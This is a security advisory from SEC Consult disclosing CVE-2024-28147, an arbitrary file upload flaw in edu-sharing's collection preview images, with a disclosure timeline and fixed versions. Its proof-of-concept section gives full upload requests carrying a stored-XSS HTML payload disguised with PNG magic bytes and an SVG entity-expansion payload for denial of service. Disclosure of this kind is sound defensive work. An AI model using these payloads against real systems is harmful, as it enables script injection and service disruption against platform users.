Edu-Sharing Arbitrary File Upload

`SEC Consult Vulnerability Lab Security Advisory < 20240620-0 >  
=======================================================================  
title: Arbitrary File Upload  
product: edu-sharing (metaVentis GmbH)  
vulnerable versions: <8.0.8-RC2, <8.1.4-RC0, <9.0.0-RC19  
fixed versions: >=8.0.8-RC2, >=8.1.4-RC0, >=9.0.0-RC19  
CVE number: CVE-2024-28147  
impact: high  
homepage: https://edu-sharing.com  
found: 2024-04-04  
by: Kai Zimmermann (Office Frankfurt)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia  
  
https://www.sec-consult.com  
  
=======================================================================  
  
Vendor description:  
-------------------  
"edu-sharing software enables you to network your learning platforms and other  
educational software. Share learning content, metadata and tools - make them  
available in an educational cloud and let your users use them in all connected  
systems."  
  
Source: https://edu-sharing.com  
  
  
Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.  
  
SEC Consult highly recommends to perform a thorough security review of the product  
conducted by security professionals to identify and resolve potential further  
security issues.  
  
  
Vulnerability overview/description:  
-----------------------------------  
1) Arbitrary File Upload (CVE-2024-28147)  
An authenticated user can upload arbitrary files in the upload function for  
collection preview images. An attacker may upload an HTML file that includes  
malicious JavaScript code which will be executed if a user visits the direct  
URL of the collection preview image (Stored Cross Site Scripting). It is also  
possible to upload SVG files that include nested XML entities. Those are parsed  
when a user visits the direct URL of the collection preview image, which may be  
utilized for a Denial of Service attack.  
  
  
Proof of concept:  
-----------------  
1) Arbitrary File Upload (CVE-2024-28147)  
An authenticated user can update the preview image of an existing collection  
by sending the following request:  
  
--------------------------------------------------------------------------------  
POST /edu-sharing/rest/collection/v1/collections/-home-/$COLLECTIONID/icon?mimetype=image%2Fpng HTTP/1.1  
Host: $SERVER  
Cookie: INGRESSCOOKIE=$INGRESSCOOKIE; JSESSIONID=$SESSIONID  
Content-Type: multipart/form-data; boundary=---------------------------159605426213527963452762824885  
Content-Length: 288  
  
-----------------------------159605426213527963452762824885  
Content-Disposition: form-data; name="file";  
  
‰PNG  
  
[...]  
-----------------------------159605426213527963452762824885--  
--------------------------------------------------------------------------------  
  
The URL parameter "mimetype" can be modified to match any uploaded file. The  
value is directly used in the server's "Content-Type" header.  
Both, the Content-Type request header and the filename parameter in the  
Content-Disposition request header do not need to be included in the data  
boundary inside the request in order to be sent successfully and can therefore  
be removed.  
The preview image can then be accessed by visiting the following URL:  
https://$SERVER/edu-sharing/preview?nodeId=$COLLECTIONID  
  
  
a. Stored Cross Site Scripting (HTML Upload)  
The initial request can be modified to include an HTML file, while keeping  
the magic bytes of a PNG image file. The "mimetype" parameter is changed to  
"text/html":  
  
--------------------------------------------------------------------------------  
POST /edu-sharing/rest/collection/v1/collections/-home-/$COLLECTIONID/icon?mimetype=text/html HTTP/1.1  
Host: $SERVER  
Cookie: INGRESSCOOKIE=$INGRESSCOOKIE; JSESSIONID=$SESSIONID  
Content-Type: multipart/form-data; boundary=---------------------------159605426213527963452762824885  
Content-Length: 288  
  
-----------------------------159605426213527963452762824885  
Content-Disposition: form-data; name="file";  
  
‰PNG  
  
<!DOCTYPE html>  
<html>  
<body>  
<h1>Test</h1>  
<script>alert(window.location)</script>  
</body>  
</html>  
-----------------------------159605426213527963452762824885--  
--------------------------------------------------------------------------------  
  
Visiting the preview URL as seen in figure 1 below shows that the JavaScript  
code is executed:  
[01_stored_xss.png]  
  
  
b. Denial of Service (SVG Upload)  
The initial request can be modified to upload an SVG file containing  
nested XML entities. The "mimetype" parameter is changed to "image%2Fsvg":  
  
--------------------------------------------------------------------------------  
POST /edu-sharing/rest/collection/v1/collections/-home-/$COLLECTIONID/icon?mimetype=image%2Fsvg HTTP/1.1  
Host: $SERVER  
Cookie: INGRESSCOOKIE=$INGRESSCOOKIE; JSESSIONID=$SESSIONID  
Content-Type: multipart/form-data; boundary=---------------------------29539943986372261721095197803  
Content-Length: 581  
  
-----------------------------29539943986372261721095197803  
Content-Disposition: form-data; name="file";  
  
<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY bar "Text "><!ENTITY t1   
"&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;"><!ENTITY t2 "&t1;&t1;&t1;&t1;">]>  
<svg xmlns="http://www.w3.org/2000/svg">  
<data>&t2;</data>  
</svg>  
  
-----------------------------29539943986372261721095197803--  
--------------------------------------------------------------------------------  
  
Visiting the preview URL as seen in figure 2 below shows that the XML code is  
parsed:  
[02_denial_of_service]  
  
  
Vulnerable / tested versions:  
-----------------------------  
The following version has been tested which was the latest version available  
at the time of the test:  
* 9.0 (pre-release)  
  
The vendor confirmed that previous versions (8.0 and 8.1) are affected as well.  
  
  
Vendor contact timeline:  
------------------------  
2024-04-10: Contacting vendor through [email protected]  
2024-04-11: Vendor replied and confirmed security contact.  
Advisory information has been sent to vendor.  
2024-04-12: Vendor confirmed receiving the advisory and is now trying to  
reproduce the described behavior.  
2024-05-03: Reminder sent to [email protected], asking for an update on  
fixing the vulnerability.  
2024-05-07: Vendor provides affected versions. Fixes have already been implemented  
and published. Vendor is requesting to wait with the public advisory  
release in order to allow affected customers to perform the next rollout.  
2024-05-07: Vendor provides fixed versions.  
Public advisory release scheduled for 2024-06-04.  
2024-05-15: Public advisory release postponed to 2024-06-20.  
2024-06-20: Coordinated release of advisory.  
  
  
Solution:  
---------  
The repository base version in use can be identified in the Admin-Tools.  
The vendor provides a patch for the affected versions:  
* Version 8.0: Update repository version to "8.0.8-RC2" or later  
* Version 8.1: Update repository version to "8.1.4-RC0" or later  
* Version 9.0: Update repository version to "9.0.0-RC19" or later  
  
  
Workaround:  
-----------  
None  
  
  
Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF Kai Zimmermann / 2024  
`